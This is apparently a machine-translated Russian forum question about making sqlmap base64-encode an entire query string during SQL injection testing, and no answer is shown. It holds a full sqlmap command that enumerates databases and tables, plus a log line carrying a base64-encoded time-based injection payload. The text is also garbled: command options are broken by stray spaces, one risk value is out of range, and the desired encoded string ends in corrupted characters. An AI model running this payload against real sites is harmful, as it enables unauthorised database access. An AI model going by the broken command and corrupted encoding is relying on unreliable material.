Base64 Кодирование строки запроса с помощью SQLMAP

Тестирование SQL инъекций с SQLMap:

python sqlmap.py -v 2 --url = ' http://test.com/process.php?pre_email=tess@test.com&pinfos=2.95|3|29.95|30|38bbca71c4353610510db4eda8cc5bb3' --user-agent = SQLMAP - -delay = 1 --tamper = tamper / base64encode.py --timeout = 15 --retries = 2 --keep-alive --threads = 5 --eta --batch --dbms = MySQL --os = Linux - -level = 5 --risk = 4 --banner --is-dba --dbs --tables --technique = BEUST -s output / scan_report.txt --flush-session -t output / scan_trace.txt --fresh -queries> output / scan_out.txt

Я получаю этот запрос:

[01 / ноября / 2013: 17: 16: 20 -0400] "GET /process.php?pre_email=ZG9ubGltODJAaG90bWFpbC5jb20nIEFORCAzMTI4PUJFTkNITUFSSyg1MDAwMDAwLE1ENSgweDRkNDY2ZjQ5KSkgQU5EICdsbXdDJyBMSUtFICdsbXdD& pinfos = 2,95%7C3%7C29.95%7C30%7C38bbca71c4353610510db4eda8cc5bb3

Что я хочу это:

[01 / Nov / 2013: 17: 16: 20 -0400] "GET /process.php?CHJlX2VtYWlsPXRlc3NAdGVzdC5jb20mcGluZm9zPTIuOTV8M3wyOS45NXwzMHwzOGJiY2E3MWWJWNJWJJNGZHZHZHZHRZ

Может ли sqlmap base64 кодировать полную строку запроса перед ее отправкой? Сценарий base64 тампера кодирует только полезную нагрузку, которая является единственной переменной, а не полной строкой запроса.

Спасибо

0 ответов

Другие вопросы по тегам